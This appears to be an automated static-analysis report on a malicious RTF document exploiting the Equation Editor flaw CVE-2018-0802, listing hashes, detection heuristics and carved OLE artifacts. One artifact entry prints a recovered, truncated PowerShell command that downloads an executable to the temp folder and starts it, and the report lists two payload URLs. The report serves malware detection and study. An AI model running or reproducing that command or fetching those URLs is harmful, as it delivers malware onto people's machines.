Malicious RTF — malware analysis report

Static analysis result for SHA-256 169a6e3912de2159…

Verdict: MALICIOUS
File type: RTF
Size: 53.0 KB
First seen: 2018-06-30
MD5: fad828733cde4018d2f7dcdc6e2e4bae
SHA-1: d4626d5a6c9cb21eb87fe601a009df6db08ff602
SHA-256: 169a6e3912de215909b736a8ee2bc9eeafbe63ae9c0169d7ceb71b432340b33d
Risk Score: 262

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The RTF file contains multiple indicators of exploit activity, specifically related to the Equation Editor vulnerability (CVE-2018-0802). Heuristics indicate the presence of embedded OLE objects and a \objupdate control word, which forces OLE activation without user interaction. The critical ClamAV detection confirms this exploit. The embedded URLs suggest the document's primary purpose is to download and execute a second-stage payload.

Heuristics (7)

  • Equation Editor CLSID [critical, CVE likely] RTF_EQUATION_EDITOR
    Equation Editor OLE CLSID found inside an OLE object — exploited by CVE-2017-11882 / CVE-2018-0802 / CVE-2018-0798
  • ClamAV: Rtf.Exploit.CVE_2018_0802-6825822-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Rtf.Exploit.CVE_2018_0802-6825822-0
  • Suspicious extracted artifact [critical] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • \objupdate forces OLE activation [high] RTF_OBJUPDATE
    RTF contains \objupdate — forces automatic OLE object instantiation when the document is opened, bypassing user interaction. Almost exclusively seen in Equation Editor exploit documents.
  • OLE object data [medium] RTF_OBJDATA
    RTF contains 5 \objdata section(s) — embedded OLE objects
  • OlePres presentation stream in RTF OLE object [medium] RTF_OLEPRES_STREAM
    RTF contains an embedded OLE object with an OlePres presentation stream. OlePres is an OLE presentation marker and is not enough on its own to identify CVE-2025-21298.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://b7center.com/poperon.bin (in RTF body)
    • http://chimachinenow.com/poperon.bin (in RTF body)

Extracted artifacts (4)

Files carved from inside the sample during analysis.

Each entry lists Filename, Kind, Source, Size and SHA-256.

objdata_00_off0000570c.bin
  Kind: rtf-objdata-decoded
  Source: RTF \objdata at offset 0x570C
  Size: 377 bytes
  SHA-256: 9f9df4f20bf46ffe79f02ef9500bcd656d2853d076bd9955c086799dc82c74b0

objdata_01_off000075cd.bin
  Kind: rtf-objdata-decoded
  Source: RTF \objdata at offset 0x75CD
  Size: 221 bytes
  SHA-256: ad609ffc162a8f2c51146179a90ce98f4af7f47c54c9abe165f6c6d053ed0b92

objdata_02_off000077e9.bin
  Kind: rtf-objdata-decoded
  Source: RTF \objdata at offset 0x77E9
  Size: 483 bytes
  SHA-256: 34edce7f2cf3e174f5c0580177760263766badc8b415a41e1b8440347c0681c0
  Detection:
    ClamAV: No threats found
    Obfuscation or payload: likely
    Static shellcode analysis recovered URL(s): http://b7center.com/poperon.bin
    Static shellcode analysis recovered command string(s): PowerShell ""function veidrevhihS([String] $nettopcat){(New-Object System.Net.WebClient).DownloadFile($nettopcat,'%TEMP%\charles192.exe');Start-Process '%TEMP%\charles192

objdata_03_off000083db.bin
  Kind: rtf-objdata-decoded
  Source: RTF \objdata at offset 0x83DB
  Size: 4681 bytes
  SHA-256: 2739ee55bfe1b2a7508c33fd0cfd32fd82a891d81959369110cce62e729ae09e